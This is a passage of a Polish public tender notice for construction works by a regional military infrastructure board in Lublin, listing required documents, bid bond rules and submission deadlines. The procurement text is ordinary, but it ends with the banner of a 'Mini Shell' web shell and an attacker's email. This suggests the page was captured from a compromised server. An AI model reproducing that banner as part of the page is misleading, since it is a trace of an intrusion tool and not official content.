określające, czy roboty budowlane wskazane w wykazie robót, zostały wykonane należycie. Dowodami, o których mowa powyżej są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych <br/>dokumentów – inne odpowiednie dokumenty.<br/>4. WYKAZ OSÓB skierowanych do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień budowlanych, a <br/>także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami - według wzoru załączonego do SWZ;<br/>Wykaz osób powinien obejmować wszystkie osoby opisane w pkt XVII ppkt 2.4) lit. B SWZ.<br/>W ww. wykazie należy podać:<br/>- numer, rodzaj i zakres posiadanych uprawnień zawodowych<br/>- podstawę dysponowania osobą</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.(jeżeli dotyczy) OŚWIADCZENIE PODMIOTU UDOSTĘPNIAJĄCEGO<br/>WYKONAWCY ZASOBY, o którym mowa w art. 125 ust. 5 ustawy Pzp, stanowiące wstępne potwierdzenie, że Podmiot udostępniający Wykonawcy zasoby nie podlega<br/>wykluczeniu, spełnia warunki udziału w postępowaniu w zakresie wskazanym przez Zamawiającego w odniesieniu do zakresu, w jakim udostępnia Wykonawcy zasoby –<br/>zgodnie ze wzorem załączonym do SWZ – jako załącznik do oferty;<br/>2. PEŁNOMOCNICTWO – do reprezentacji Wykonawcy lub Wykonawców ubiegających się wspólnie o udzielenie zamówienia w prowadzonym przez Zamawiającego postępowaniu, w szczególności do złożenia oferty, podmiotowych środków<br/>dowodowych oraz innych oświadczeń i dokumentów oraz zawarcia umowy (jeśli dotyczy), pełnomocnictwo do reprezentacji podmiotu udostępniającego zasoby (jeśli dotyczy) - jako załącznik do oferty.<br/><br/>3. ZOBOWIĄZANIE PODMIOTU UDOSTĘPNIAJĄCEGO ZASOBY do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy, potwierdzający że Wykonawca<br/>realizując zamówienia będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>Dokument ten ma określać w szczególności:<br/> zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;<br/> sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów<br/>podmiotu udostępniającego te zasoby przy wykonaniu zamówienia;<br/> czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego<br/>Wykonawca polega w odniesieniu do warunków udziału w postępowaniu<br/>dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizują<br/>usługi/roboty budowlane, których wskazane zdolności dotyczą.<br/>Takim dokumentem może być ZOBOWIĄZANIE PODMIOTU UDOSTĘPNIAJĄCEGO<br/>ZASOBY – według wzoru załączonego do SWZ (jeśli dotyczy) - jako załącznik do oferty.<br/>4. OŚWIADCZENIE Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>zawierające wykaz robót budowlanych, które zostaną wykonane przez poszczególnych<br/>Wykonawców (jeśli dotyczy) - jako załącznik do oferty. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Oferta musi być zabezpieczona wadium o niżej wymienionej wartości:<br/>25.000,00 zł (słownie: dwadzieścia pięć tysięcy 00/100 złotych)<br/>2. Wadium może być wniesione w jednej lub w kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz.U. z 2024 r. poz. 419 ze zm.).<br/>3. Wadium w formie pieniężnej należy wpłacić przelewem na rachunek bankowy Rejonowego Zarządu Infrastruktury w Lublinie, 20-020 Lublin, ul. Lipowa 1a, konto <br/>nr: 58 1010 1339 0043 0113 9120 1000<br/>Wadium musi być wniesione najpóźniej do godz. 10:00 dnia 31.07.2025 r.<br/>Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w wyżej <br/>wymienionym terminie znajdzie się na rachunku bankowym Rejonowego Zarządu Infrastruktury w Lublinie.<br/>4. W przypadku wnoszenia wadium w formie gwarancji lub poręczenia, o których mowa w pkt XXI ppkt 2.2) - 4) SWZ, Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia w postaci elektronicznej poprzez wczytanie <br/>tego pliku na platformie e-Zamówienia, najpóźniej do godz. 10:00 dnia 31.07.2025r.<br/>Z treści gwarancji (poręczenia) musi jednoznacznie wynikać:<br/>a. jaki jest sposób reprezentacji Gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta.<br/>b. nieodwołalnie i bezwarunkowo - na pierwsze pisemne żądanie zgłoszone przez Rejonowy Zarząd Infrastruktury w Lublinie, ul. Lipowa 1a, 20-020 Lublin, w terminie związania ofertą - zobowiązanie Gwaranta do wypłaty <br/>Zamawiającemu, pełnej kwoty wadium w okolicznościach określonych w art. 98 ust. 6 ustawy Pzp.<br/>5. W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, wadium wniesione przez jednego z Wykonawców (jednego z konsorcjantów lub wspólników spółki cywilnej) uważa się za wniesione prawidłowo.<br/>6. Oferta Wykonawcy, który nie wniósł wadium, wniósł je w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub który złożył wniosek o zwrot wadium, w przypadku o którym mowa w art. 98 ust. 2 pkt 3 <br/>ustawy Pzp, podlega odrzuceniu na podstawie art. 226 ust. 1 pkt 14) ustawy Pzp.<br/>7. Okoliczności i zasady zwrotu wadium, jego zatrzymania oraz zaliczania na poczet zabezpieczenia należytego wykonania umowy określają odpowiednie przepisy ustawy Pzp.<br/>8. Złożenie wniosku o zwrot wadium, o którym mowa w art. 98 ust. 2 ustawy Pzp, powoduje rozwiązanie stosunku prawnego z Wykonawcą wraz z utratą przez niego prawa korzystania ze środków ochrony prawnej, o których mowa w dziale IX ustawy <br/>Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Każdy z Wykonawców wchodzący w skład spółki cywilnej lub konsorcjum musi:<br/>wykazać, że nie podlega wykluczeniu na podstawie art.108 ust. 1, art. 109 ust. 1 pkt 1)<br/>i 4) ustawy Pzp oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych<br/>rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz<br/>służących ochronie bezpieczeństwa narodowego.<br/>a) Zamawiający dokonując oceny spełnienia warunku udziału w postępowaniu,<br/>o którym mowa w pkt XVII ppkt 2.1) SWZ uzna, iż warunek został spełniony<br/>jeżeli:<br/>- każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>wykonujący działalność gospodarczą lub zawodową wykaże, że jest wpisany<br/>do jednego z rejestrów zawodowych lub handlowych prowadzonych w kraju,<br/>w którym ma siedzibę lub miejsce zamieszkania.<br/>b) Zamawiający dokonując oceny spełnienia warunku udziału w postępowaniu,<br/>o którym mowa w pkt XVII ppkt 2.4) lit. A SWZ uzna, iż warunek został<br/>spełniony jeżeli:<br/> co najmniej jeden z Wykonawców wchodzących w skład spółki cywilnej lub<br/>konsorcjum wykaże, że wykonał robotę budowlaną, o której mowa w pkt XVII ppkt<br/>2.4) lit. A SWZ;<br/>lub<br/>Wykonawcy wchodzący w skład spółki cywilnej lub konsorcjum wykażą, że łącznie<br/>wykonali robotę budowlaną, o której mowa w pkt XVII ppkt 2.4) lit. A SWZ.<br/>Zamawiający wymaga, aby część zamówienia związana z warunkiem udziału<br/>w postępowaniu została zrealizowana przez tego z Wykonawców wchodzącego<br/>w skład spółki cywilnej lub konsorcjum, który wykazał się spełnieniem danego<br/>warunku udziału w postępowaniu (etap realizacji zamówienia) tzn. wykonał tę część<br/>zamówienia, do realizacji której potwierdził wymagane zdolności.<br/> Wykonawcy wraz z ofertą złożą Oświadczenie, o którym mowa w pkt XVIII Etap 1<br/>ppkt 5 SWZ.<br/>2. Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika (lidera) do<br/>reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia tj.:<br/>w szczególności do złożenia oferty, oświadczeń i zawiadomień albo do<br/>reprezentowania ich w postępowaniu i zawarcia umowy na wykonanie<br/>przedmiotowego zamówienia publicznego.<br/>3. Wszelka korespondencja dokonywana będzie wyłącznie z pełnomocnikiem (lub<br/>liderem). Wszelkie rozliczenia (wystawianie faktur, płatności) dokonywane będą<br/>z pełnomocnikiem lub liderem wskazanym w ofercie lub innych<br/>dokumentach/oświadczeniach złożonych w postępowaniu.<br/>4. Wypełniając ofertę, jak również inne dokumenty powołujące się na „Wykonawcę&#34;,<br/>w miejscu np. „nazwa i adres Wykonawcy&#34;, należy wpisać pełne dane dotyczące<br/>wspólników spółki cywilnej lub pełne dane dotyczące lidera i partnera (partnerów)<br/>konsorcjum.<br/>5. Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie<br/>zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców.<br/>6. Zgodnie z art. 117 ust. 4 ustawy Pzp, Wykonawcy wspólnie ubiegający się<br/>o udzielenie zamówienia, w przypadku o którym mowa w art. 117 ust. 2 i 3 ustawy<br/>Pzp, dołączają do oferty oświadczenie, z którego wynika które roboty budowlane<br/>wykonają poszczególni Wykonawcy <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzania znajdują się we wzorze umowy, który stanowi załącznik do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-31 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">oferty należy składać przy użyciu platformy e-Zamowienia: http://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-31 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-08-29</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu z postępowania na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w<br/>zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego

Creat By MiNi SheLL
Email: jattceo@gmail.com